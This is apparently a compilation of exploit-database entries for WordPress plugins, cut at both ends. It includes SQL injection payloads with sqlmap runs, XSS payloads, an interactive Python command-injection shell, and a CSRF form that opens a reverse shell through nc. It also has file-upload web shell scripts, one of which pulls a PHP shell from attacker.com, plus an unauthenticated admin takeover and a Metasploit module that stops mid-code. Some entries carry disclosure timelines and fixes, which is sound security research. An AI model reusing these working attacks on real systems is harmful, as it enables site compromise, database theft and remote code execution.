<br>question_id=-3 union select concat(0x3c62723e3c666f6e7420636f6c6f723d626c61636b2073697a653d343e3c623e2d2d3d3d5b5b20496e64695368656c6c204c61625d5d3d3d2d2d203c62723e4461746162617365204e616d653a202d ,database(),0x3c62723e,0x446174616261736520557365723a202d20,user(),0x3c62723e,group_concat(0x3c62723e,table_name,0x7e,column_name),0x3c62723e,0x3c62723e3c62723e3c62723e),2 from information_schema.columns where table_schema=database()--&poll_answer_securety=0c7d4ce561&date_answers[0]=5
POC<br>
<img src="https://github.com/incredibleindishell/exploit-code-by-me/blob/master/WordPress%20Polls%20plugin-1.2.4-%20SQL%20Injection%20vulnerability/injected.png?raw=true">
<br>
--==[[ Greetz To ]]==--
Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,
<br>Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,
<br>Hackuin,Alicks,mike waals,cyber gladiator,Cyber Ace,Golden boy INDIA,d3, rafay baloch, nag256
<br>Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash
<br>
--==[[ Love To ]]==--
<br>My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,
<br>Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)
# Exploit Title: WordPress Plugin Poll, Survey, Questionnaire and Voting system 1.5.2 - 'date_answers' Blind SQL Injection
# Date: 09/06/2021
# Exploit Author: inspired - Toby Jackson
# Blog Post: https://in-spired.xyz/wpdevart-polls-blind-sql-injection/
# Vendor Homepage: https://wpdevart.com/wordpress-polls-plugin
# Software Link: https://en-gb.wordpress.org/plugins/polls-widget/
# Version: Tested on version 1.5.0 and 1.5.2 (Older versions may be affected)
# Tested on: WordPress
## I. Vulnerability
Blind SQL Injection
## II. Product Overview
The software allows users to quickly generate polls and voting system and displays the results in real time.
## III. Exploit
A vulnerability has been discovered in the wpdevart wordpress plugin "Poll, Survey, Questionnaire and Voting system" version 1.5.0 and 1.5.2. It is possible to perform a blind SQL injection on the date_answers[] parameter when casting a vote. This can be used to dump the back end database. Version 1.5.2 requires the changing of headers using an appropriate method for spoofing an IP address, such as X-Forwarded-For.
## IV. Vulnerable Code
The vulnerable code resides in the front_end.php page within the save_poll_in_databese() function. It takes the $question_id and $current_user_ip before storing the vote in a variable called $new_voted_array, as seen below, from the date_answers post parameter.
$new_voted_array=$_POST['date_answers'];
The array is then looped through and the $new_answer variable is used as part of the where query without being sanitized.
if($new_voted_array)
foreach($new_voted_array as $new_answer) {
$wpdb->query('UPDATE '.$wpdb->prefix.'polls SET vote = vote+1 WHERE `question_id` = '.$question_id.' AND `answer_name` = '.$new_answer.'');
The above code is fixed in version 1.5.1, but there remains a vulnerability in 1.5.1 and 1.5.2. When a user is voting for the first time, the vote is cast in a different statement that also does not get sanitized. Coupled with the fact the application uses user-controlled headers to determine whether a user has voted already, an attacker can just edit their origin IP with an X-Forwarded-For header to vote multiple times but also invoke the SQL Injection still.
if ($new_voted_array)
foreach ($new_voted_array as $answer) {
$wpdb->query('UPDATE ' . $wpdb->prefix . 'polls SET vote = vote+1 WHERE `question_id` = ' . $question_id . ' AND `answer_name` = ' . $answer . '');
}
## IV. Proof of Concept
A typical vote, intercepted with burp, will look like the request below. Editing this to contain a sleep will cause the server to sleep for X period.
------
POST /blog/wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 67
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/blog/index.php/2021/06/09/research/
Cookie: wordpress_d23cdc2cc5dd18709e8feb86452d865b=inspired%7C1623345285%7C52E5QESQG5PIPUT2tixVHPIkdN8inwgNojy9hs0JvDS%7C3538f3f44a02304781e099f970dc762fd89e88378a46613cf636fcd28a9755d3; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_d23cdc2cc5dd18709e8feb86452d865b=inspired%7C1623345285%7C52E5QESQG5PIPUT2tixVHPIkdN8inwgNojy9hs0JvDS%7C3d7d7b6485e1daa04da753dcc4e85a56150091301de3668ffe108e7829134f0d; wp-settings-time-1=1623238438
question_id=1&poll_answer_securety=5b29ac18fe&date_answers%5B0%5D=sleep(10)
------
Utilizing this, the database can easily be dumped by capturing the request, with an interceptor such as burpsuite, and using sqlmap. By placing a * at the required injection point, sqlmap will first test this location.
------
POST /blog/wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 67
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/blog/index.php/2021/06/09/research/
Cookie: wordpress_d23cdc2cc5dd18709e8feb86452d865b=inspired%7C1623345285%7C52E5QESQG5PIPUT2tixVHPIkdN8inwgNojy9hs0JvDS%7C3538f3f44a02304781e099f970dc762fd89e88378a46613cf636fcd28a9755d3; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_d23cdc2cc5dd18709e8feb86452d865b=inspired%7C1623345285%7C52E5QESQG5PIPUT2tixVHPIkdN8inwgNojy9hs0JvDS%7C3d7d7b6485e1daa04da753dcc4e85a56150091301de3668ffe108e7829134f0d; wp-settings-time-1=1623238438
question_id=1&poll_answer_securety=5b29ac18fe&date_answers%5B0%5D=*
------
Save this request to a file, request.txt, and run the tool.
------
sqlmap -r request.txt --dbms=mysql --dbs --level=5 --risk=3
[14:30:54] [INFO] testing MySQL
[14:30:54] [INFO] confirming MySQL
[14:30:54] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.46
back-end DBMS: MySQL >= 8.0.0
[14:30:54] [INFO] fetching database names
[14:30:54] [INFO] fetching number of databases
[14:30:54] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[14:30:54] [INFO] retrieved: 2
[14:30:54] [INFO] resumed: information_schema
[14:30:54] [INFO] resumed: wordpress
available databases [2]:
[*] information_schema
[*] wordpress
------
------
sqlmap -r request.txt --dbms=mysql -D wordpress --tables --level=5 --risk=3
Database: wordpress
[19 tables]
+-----------------------+
| wp_commentmeta |
| wp_comments |
| wp_democracy_a |
| wp_democracy_log |
| wp_democracy_q |
| wp_links |
| wp_options |
| wp_polls |
| wp_polls_question |
| wp_polls_templates |
| wp_polls_users |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_termmeta |
| wp_terms |
| wp_usermeta |
| wp_users |
+-----------------------+
------
https://www.youtube.com/watch?v=Fj1zeXNxDYQ
In versions 1.5.1 and 1.5.2, this vulnerability only occurs on the first vote a user casts. Adding a random X-Forwarded-For header to the requests will allow for the attack to be repeated as described above.
This has been demonstrated in the following PoC.
https://www.youtube.com/watch?v=P1r7gk0DSaM
## VI. Impact
An attacker can dump the back-end database of the server and gain access to user credentials which could then be used to perform further malicious acts. If configured incorrectly, it can also lead to the attacker being able to obtain remote code execution on the server.
## VII. SYSTEMS AFFECTED
WordPress websites running "Poll, Survey, Questionnaire and Voting system" plugin version 1.5.2 (older versions may also be affected).
## VIII. REMEDIATION
The update has been fixed in version 1.5.3, so it is advised to update to this version if using the plugin.
## VIIII. DISCLOSURE TIMELINE
-------------------------
June 9, 2021 1: Vulnerability identified.
June 9, 2021 2: Informed developer of the vulnerability.
June 9, 2021 3: Vendor replied to discuss the vulnerability in more detail.
June 9, 2021 4: Sent vendor proof of concept and impacted code blocks.
June 10, 2021 1: Vendor emails to state the vulnerability has been fixed.
June 10, 2021 2: Confirmed initial fix, vendor happy to disclose the vulnerability.
June 10, 2021 3: Requested CVE Number.
June 19, 2021 1: WPScan contact to discuss vulnerability.
June 19, 2021 2: Confirmed fix is not valid when new user votes or edits headers.
June 19, 2021 3: Contacted vendor to request further fix.
June 22, 2021 1: Vendor confirms fix. Information made public.
source: https://www.securityfocus.com/bid/58421/info
The podPress plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
podPress 8.8.10.13 is vulnerable; other versions may also be affected.
http://www.example.com/wp-content/plugins/podpress/players/1pixelout/1pixelout_player.swf?playerID=\"))}catch(e){alert(/xss/)}//
source: https://www.securityfocus.com/bid/56661/info
The Plg Novana plugin is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/wp-content/plugins/plg_novana/novana_detail.php?lightbox[width]=700&lightbox[height]=400&id=[sql]
# Exploit Title: Wordpress Plugin Playlist for Youtube - Stored Cross-Site Scripting (XSS)
# Date: 22 March 2024
# Exploit Author: Erdemstar
# Vendor: https://wordpress.com/
# Version: 1.32
# Proof Of Concept:
1. Click Add a new playlist and enter the XSS payload as below into the properties named "Name" or "Playlist ID".
# PoC Video: https://www.youtube.com/watch?v=jrH5OHBoTns
# Vulnerable Properties name: name, playlist_id
# Payload: "><script>alert(document.cookie)</script>
# Request:
POST /wp-admin/admin.php?page=playlists_yt_free HTTP/2
Host: erdemstar.local
Cookie: thc_time=1713843219; booking_package_accountKey=2; wordpress_sec_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7C27abdae5aa28462227b32b474b90f0e01fa4751d5c543b281c2348b60f078d2f; wp-settings-time-4=1711124335; cld_2=like; _hjSessionUser_3568329=eyJpZCI6ImY4MWE3NjljLWViN2MtNWM5MS05MzEyLTQ4MGRlZTc4Njc5OSIsImNyZWF0ZWQiOjE3MTEzOTM1MjQ2NDYsImV4aXN0aW5nIjp0cnVlfQ==; wp-settings-time-1=1712096748; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse%26uploader%3D1%26Categories_tab%3Dpop%26urlbutton%3Dfile%26editor%3Dtinymce%26unfold%3D1; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7Cc64c696fd4114dba180dc6974e102cc02dc9ab8d37482e5c4e86c8e84a1f74f9
Content-Length: 178
Cache-Control: max-age=0
Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
Origin: https://erdemstar.local
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://erdemstar.local/wp-admin/admin.php?page=playlists_yt_free
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i
_wpnonce=17357e6139&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dplaylists_yt_free&name="><script>alert(document.cookie)</script>&playlist_id=123&template=1&text_size=123&text_color=%23000000
# Exploit Title: WordPress Plugin Plainview Activity Monitor 20161228 - Remote Code Execution (RCE) (Authenticated) (2)
# Date: 07.07.2021
# Exploit Author: Beren Kuday GORUN
# Vendor Homepage: https://wordpress.org/plugins/plainview-activity-monitor/
# Software Link: https://www.exploit-db.com/apps/2e1f384e5e49ab1d5fbf9eedf64c9a15-plainview-activity-monitor.20161228.zip
# Version: 20161228 and possibly prior
# Fixed version: 20180826
# CVE : CVE-2018-15877
"""
-------------------------
Usage:
┌──(root@kali)-[~/tools]
└─# python3 WordPress-Activity-Monitor-RCE.py
What's your target IP?
192.168.101.28
What's your username?
mark
What's your password?
password123
[*] Please wait...
[*] Perfect!
www-data@192.168.101.28 whoami
www-data
www-data@192.168.101.28 pwd
/var/www/html/wp-admin
www-data@192.168.101.28 id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
"""
import requests
from bs4 import BeautifulSoup
def exploit(whoami, ip):
while 1:
cmd = input(whoami+"@"+ip+" ")
url = 'http://' + ip + '/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools'
payload = "google.com.tr | " + cmd
data = {'ip': payload , 'lookup' : 'lookup' }
x = requests.post(url, data = data, cookies=getCookie(ip))
html_doc = x.text.split("<p>Output from dig: </p>")[1]
soup = BeautifulSoup(html_doc, 'html.parser')
print(soup.p.text)
def poc(ip):
url = 'http://' + ip + '/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools'
myobj = {'ip': 'google.fr | whoami', 'lookup' : 'lookup' }
x = requests.post(url, data = myobj, cookies=getCookie(ip))
html_doc = x.text.split("<p>Output from dig: </p>")[1]
soup = BeautifulSoup(html_doc, 'html.parser')
print("[*] Perfect! ")
exploit(soup.p.text, ip)
def getCookie(ip):
url = 'http://' + ip + '/wp-login.php'
#log=admin&pwd=admin&wp-submit=Log+In&redirect_to=http%3A%2F%2Fwordy%2Fwp-admin%2F&testcookie=1
data = {'log':username, 'pwd':password, 'wp-submit':'Log In', 'testcookie':'1'}
x = requests.post(url, data = data)
cookies = {}
cookie = str(x.headers["Set-Cookie"])
for i in cookie.split():
if(i.find("wordpress") != -1 and i.find("=") != -1):
cookies[i.split("=")[0]] = i.split("=")[1][:len(i.split("=")[1])-1]
return cookies
ip = input("What's your target IP?\n")
username = input("What's your username?\n")
password = input("What's your password?\n")
print("[*] Please wait...")
poc(ip)
<!--
About:
===========
Component: Plainview Activity Monitor (Wordpress plugin)
Vulnerable version: 20161228 and possibly prior
Fixed version: 20180826
CVE-ID: CVE-2018-15877
CWE-ID: CWE-78
Author:
- LydA(c)ric Lefebvre (https://www.linkedin.com/in/lydericlefebvre)
Timeline:
===========
- 2018/08/25: Vulnerability found
- 2018/08/25: CVE-ID request
- 2018/08/26: Reported to developer
- 2018/08/26: Fixed version
- 2018/08/26: Advisory published on GitHub
- 2018/08/26: Advisory sent to bugtraq mailing list
Description:
===========
Plainview Activity Monitor Wordpress plugin is vulnerable to OS
command injection which allows an attacker to remotely execute
commands on underlying system. Application passes unsafe user supplied
data to ip parameter into activities_overview.php.
Privileges are required in order to exploit this vulnerability, but
this plugin version is also vulnerable to CSRF attack and Reflected
XSS. Combined, these three vulnerabilities can lead to Remote Command
Execution just with an admin click on a malicious link.
References:
===========
https://github.com/aas-n/CVE/blob/master/CVE-2018-15877/
PoC:
-->
<html>
<!-- Wordpress Plainview Activity Monitor RCE
[+] Version: 20161228 and possibly prior
[+] Description: Combine OS Commanding and CSRF to get reverse shell
[+] Author: LydA(c)ric LEFEBVRE
[+] CVE-ID: CVE-2018-15877
[+] Usage: Replace 127.0.0.1 & 9999 with you ip and port to get reverse shell
[+] Note: Many reflected XSS exists on this plugin and can be combine with this exploit as well
-->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost:8000/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data">
<input type="hidden" name="ip" value="google.fr| nc -nlvp 127.0.0.1 9999 -e /bin/bash" />
<input type="hidden" name="lookup" value="Lookup" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
source: https://www.securityfocus.com/bid/47142/info
The Placester WordPress Plugin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Placester 0.1.0 is vulnerable; other versions may also be affected.
http://www.example.com/wordpress/wp-content/plugins/placester/admin/support_ajax.php?ajax_action=%22%3E%3Cscript%3Ealert%280%29%3C/script%3E
Mogwai Security Advisory MSA-2015-01
----------------------------------------------------------------------
Title: WP Pixarbay Images Multiple Vulnerabilities
Product: Pixarbay Images (Wordpress Plugin)
Affected versions: 2.3
Impact: high
Remote: yes
Product link: https://wordpress.org/plugins/pixabay-images/
Reported: 14/01/2015
by: Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung Muench)
Vendor's Description of the Software:
----------------------------------------------------------------------
Pixabay Images is a WordPress plugin that let's you pick CC0 public
domain pictures from Pixabay and insert them with just a click anywhere
on your blog. The images are safe to use, and paying attribution or
linking back to the source is not required.
Business recommendation:
----------------------------------------------------------------------
Update to version 2.4
Vulnerability description:
----------------------------------------------------------------------
1) Authentication bypass
The plugin does not correctly check if the user is logged in. Certain
code can be called without authentication
2) Arbitrary file upload
The plugin code does not validate the host in the provided download URL,
which allows to upload malicious files, including PHP code.
3) Path Traversal
Certain values are not sanitized before they are used in a file operation.
This allows to store files outside of the "download" folder.
4) Cross Site Scripting (XSS)
The generated author link uses unsanitized user values which can be
abused for Cross Site Scripting (XSS) attacks.
Proof of concept:
----------------------------------------------------------------------
The following PoC Python script can be used to download PHP files from
a attacker controlled host.
#!/usr/bin/env python
import argparse
import httplib, urllib
from urlparse import urlparse
def exploit(target_url, shellcode_url):
target = urlparse(target_url)
params = urllib.urlencode({'pixabay_upload': 1, 'image_url': shellcode_url,
'image_user': 'none', 'q':'xxx/../../../../../../mogwai'})
headers = headers = {"Content-type": "application/x-www-form-urlencoded"}
print "[+] Sending download request...."
conn = httplib.HTTPConnection(target.netloc)
conn.request("POST", target.path + "/wp-admin/", params, headers)
response = conn.getresponse()
response_data = response.read()
if response.status != 200 and response_data != "Error: File attachment metadata
error":
print "[-] Something went wrong"
print response_data
exit()
conn.close()
# ---- Main code ----------------
parser = argparse.ArgumentParser()
parser.add_argument("target_url", help="The target url, for example
http://foo.bar/blog/")
parser.add_argument("shellcode_url", help="The url of the PHP file that should
be uploaded, for example: http://attacker.com/shell.php")
print "----------------------------------------------"
print " pixabay upload wordpress plugin exploit PoC"
print " Mogwai security"
print "----------------------------------------------"
arguments = parser.parse_args()
exploit(arguments.target_url, arguments.shellcode_url)
Vulnerable / tested versions:
----------------------------------------------------------------------
Pixabay Images 2.3
Disclosure timeline:
----------------------------------------------------------------------
14/01/2014: Reporting issues to the plugin author
15/01/2014: Release of fixed version (2.4)
19/01/2014: Public advisory
Advisory URL:
----------------------------------------------------------------------
https://www.mogwaisecurity.de/#lab
----------------------------------------------------------------------
Mogwai, IT-Sicherheitsberatung Muench
Steinhoevelstrasse 2/2
89075 Ulm (Germany)
info@mogwaisecurity.de
# Exploit Title: WordPress Plugin Pie Register 3.7.1.4 - Admin Privilege Escalation (Unauthenticated)
# Google Dork: inurl:/plugins/pie-register/
# Date: 08.10.2021
# Exploit Author: Lotfi13-DZ
# Vendor Homepage: https://wordpress.org/plugins/pie-register/
# Software Link: https://downloads.wordpress.org/plugin/pie-register.3.7.1.4.zip
# Version: <= 3.7.1.4
# Tested on: ubuntu
Vulnerable arg: [user_id_social_site=1] <== will return the authentications cookies for user 1 (admin).
Exploit: wget -q -S -O - http://localhost/ --post-data 'user_id_social_site=1&social_site=true&piereg_login_after_registration=true&_wp_http_referer=/login/&log=null&pwd=null' > /dev/null
# Exploit Title: Pie Register 2.0.13 Privilege escalation
# Date: 16-10-2014
# Software Link: https://wordpress.org/plugins/pie-register/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# CVE: CVE-2014-8802
# Category: webapps
1. Description
Anyone can import CSV file. Pie Register will import users from this file.
File: pie-register\pie-register.php
add_action( 'init', array($this,'pie_main') );
function pie_main() {
// I skip unnecessary lines
if(isset($_FILES['csvfile']['name'])) {
$this->importUsers();
}
}
http://security.szurek.pl/pie-register-2013-privilege-escalation.html
2. Proof of Concept
Create CSV file based on given example:
"Username","Display name","E-mail","User Registered","First Name","Last Name","Nickname","Role"
"hack","Hacked","hacked@hacked.hacked","2010-10-10 20:00:00","Hacked","Hacked","Hacked","administrator"
Import account using:
<form method="post" action="http://wordpress-instalation" enctype="multipart/form-data">
Input CSV<input type="file" name="csvfile">
<input type="submit" value="Add user!">
</form>
Create another standard account using wp-login.php?action=register.
After login go to wp-admin/profile.php and search "uid" in page source.
Number after "uid" is our current account id. For example: "uid":"123".
We can assume that previously imported admin account has id-1 (or id-x where x is natural number).
We can activate this account using:
<form method="post" action="http://wordpress-instalation">
<input type="hidden" name="verifyit" value="1">
Account id:<input type="text" name="vusers[]" value="">
<input type="submit" value="Activate user!">
</form>
Finally we can reset password using: http://wordpress-instalation/wp-login.php?action=lostpassword
3. Solution:
Update to version 2.0.14
https://downloads.wordpress.org/plugin/pie-register.2.0.14.zip
# Title: WordPress Plugin Pie Register < 3.0.9 - Blind SQL Injection
# Author: Manuel García Cárdenas
# Date: 2018-05-10
# Software: WordPress Plugin Pie Register 3.0.9
# CVE: CVE-2018-10969
# I. VULNERABILITY
# WordPress Plugin Pie Register 3.0.9 - Blind SQL Injection
# II. BACKGROUND
# Pie-Register is a quick and easy way to brand your Registration Pages on
# WordPress sites.
# III. DESCRIPTION
# This bug was found using the portal in the files:
# /pie-register/classes/invitation_code_pagination.php: if ( isset(
# $_GET['order'] ) && $_GET['order'] )
# /pie-register/classes/invitation_code_pagination.php: $order =
# $_GET['order'];
# And when the query is executed, the parameter "order" it is not sanitized.
# /pie-register/classes/invitation_code_pagination.php: $this->order = esc_sql( $order );
# IV. PROOF OF CONCEPT
# The following URL have been confirmed to all suffer from Time Based SQL Injection.
GET
/wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc
(original)
GET
/wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc%2c(select*from(select(sleep(2)))a)
HTTP/1.1(2 seconds of response)
GET
/wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc%2c(select*from(select(sleep(30)))a)
HTTP/1.1(30 seconds of response)
# V. SYSTEMS AFFECTED
# Pie Register <= 3.0.9
# VI. DISCLOSURE TIMELINE
# May 10, 2018 1: Vulnerability acquired by Manuel Garcia Cardenas
# May 10, 2018 2: Send to vendor without response
# June 05, 2018 3: Second email to vendor without response
# June 11, 2018 4: Send to the Full-Disclosure lists
# VII. Solution
# Disable plugin until a fix is available
source: https://www.securityfocus.com/bid/61140/info
Pie Register plugin for WordPress is prone to multiple cross-site scripting vulnerabilities.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Pie Register 1.30 is vulnerable; other versions may also be affected.
<?php echo $_POST['pass1'];?>
<?php echo $_POST['pass2'];?>
* Exploit Title: Wordpress Plugin PicUploader 1.0 - Remote File Upload
* Google Dork: N/A
* Date: 2020.03.22
* Exploit Author: Milad Karimi
* Vendor Homepage: https://github.com/xiebruce/PicUploader
* Software Link: https://github.com/xiebruce/PicUploader
* Category : webapps
* Version: 1.0
* Tested on: windows 10 , firefox
* CVE : N/A
Vulnerable Source:
88: move_uploaded_file move_uploaded_file($tmp_name, $dest))
86: foreach($files['tmp_name'] as $key=>$tmp_name)
80: $files = $_FILES['file']){
72: $_FILES['file'] = $_FILES[$plugin]; // if(isset($_FILES)),
87: $dest = $tmpDir . '/' . $files['name'][$key];
81: $tmpDir = APP_PATH . '/.tmp';
24: define('APP_PATH', strtr(__DIR__, '\\', '/')); // define()
80: $files = $_FILES['file']){
72: $_FILES['file'] = $_FILES[$plugin]; // if(isset($_FILES)),
80: if(isset($_FILES['file']) && $files = $_FILES['file'])
84: if(is_array($files['tmp_name']))
Exploit:
<?php
$shahab="file.jpg";
$ch = curl_init("http://localhost/wordpress/wp-content/pluginsPicUploader-master/index.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('zip'=>"@$shahab"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);
print "$result";
?>
Location File:
http://localhost/wordpress/wp-content/plugins/PicUploader/file.jpg
source: https://www.securityfocus.com/bid/53894/info
Picturesurf Gallery plugin is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this issue to upload arbitrary PHP code and run it in the context of the Web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
Picturesurf Gallery 1.2 is vulnerable; other versions may also be affected.
PostShell.php
<?php
$uploadfile="lo.php.gif";
$ch =
curl_init("http://www.exemple.com/wordpress/wp-content/plugins/picturesurf-gallery/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'is_simple'=>'is_simple'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access :
http://www.exemple.com/wordpress/wp-content/plugins/picturesurf-gallery/data/upload/lo.php.gif
lo.php.gif
GIF89a???????????!??????,???????D?;?
<?php
phpinfo();
?>
# Exploit Title: WordPress Plugin Picture Gallery 1.4.2 - 'Edit Content URL' Stored Cross-Site Scripting (XSS)
# Date: 2021-08-06
# Exploit Author: Aryan Chehreghani
# Software Link: https://wordpress.org/plugins/picture-gallery/
# Version: 1.4.2
# Tested on: Windows 10
How to Reproduce this Vulnerability:
1. Install WordPress 5.8
2. Install and activate Picture Gallery - Frontend Image Uploads, AJAX Photo List
3. Navigate to admin menu wrap >> Picture Gallery >> Options >> Access Control Tab >> enter the XSS payload into the Edit Content URL input field.
4. Click Save Changes.
5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload is executing successfully and we are getting a pop-up.
6. Payload Used: "><script>alert(document.cookie)</script>
# # # # #
# Exploit Title: WordPress Plugin PICA Photo Gallery v1.0 - SQL Injection
# Google Dork: N/A
# Date: 09.03.2017
# Vendor Homepage: https://www.apptha.com/
# Software: https://www.apptha.com/category/extension/Wordpress/PICA-Photo-Gallery
# Demo: http://www.apptha.com/demo/pica-photo-gallery
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/?aid=[SQL]
# For example;
# -3+/*!50000union*/+select+0x496873616e2053656e63616e3c62723e7777772e696873616e2e6e6574,2,3,@@version--+-
# wpapptha_term_relationships,wpapptha_term_taxonomy,wpapptha_terms,wpapptha_usermeta,wpapptha_users
# Etc..
# # # # #
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::HTTP::Wordpress
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'WordPress PHPMailer Host Header Command Injection',
'Description' => %q{
This module exploits a command injection vulnerability in WordPress
version 4.6 with Exim as an MTA via a spoofed Host header to PHPMailer,
a mail-sending library that is bundled with WordPress.
A valid WordPress username is required to exploit the vulnerability.
Additionally, due to the altered Host header, exploitation is limited to
the default virtual host, assuming the header isn't mangled in transit.
If the target is running Apache 2.2.32 or 2.4.24 and later, the server
may have HttpProtocolOptions set to Strict, preventing a Host header
containing parens from passing through, making exploitation unlikely.
},
'Author' => [
'Dawid Golunski', # Vulnerability discovery
'wvu' # Metasploit module
],
'References' => [
['CVE', '2016-10033'],
['URL', 'https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html'],
['URL', 'http://www.exim.org/exim-html-current/doc/html/spec_html/ch-string_expansions.html'],
['URL', 'https://httpd.apache.org/docs/2.4/mod/core.html#httpprotocoloptions']
],
'DisclosureDate' => 'May 3 2017',
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Privileged' => false,
'Targets' => [
['WordPress 4.6 / Exim', {}]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'PAYLOAD' => 'linux/x64/meterpreter_reverse_https',
'CMDSTAGER::FLAVOR' => 'wget'
},
'CmdStagerFlavor' => ['wget', 'curl']
))
register_options([
OptString.new('USERNAME', [true, 'WordPress username', 'admin'])
])
register_advanced_options([
OptString.new('WritableDir', [true, 'Writable directory', '/tmp'])
])
deregister_options('VHOST', 'URIPATH')
end
def check
if (version = wordpress_version)
version = Gem::Version.new(version)
else
return CheckCode::Safe
end
vprint_status("WordPress #{version} installed at #{full_uri}")
if version <= Gem::Version.new('4.6')
CheckCode::Appears
else
CheckCode::Detected
end
end
def exploit
if check == CheckCode::Safe
print_error("Is WordPress installed at #{full_uri} ?")
return
end
# Since everything goes through strtolower(), we need lowercase
print_status("Generating #{cmdstager_flavor} command stager")
@cmdstager = generate_cmdstager(
'Path' => "/#{Rex::Text.rand_text_alpha_lower(8)}",
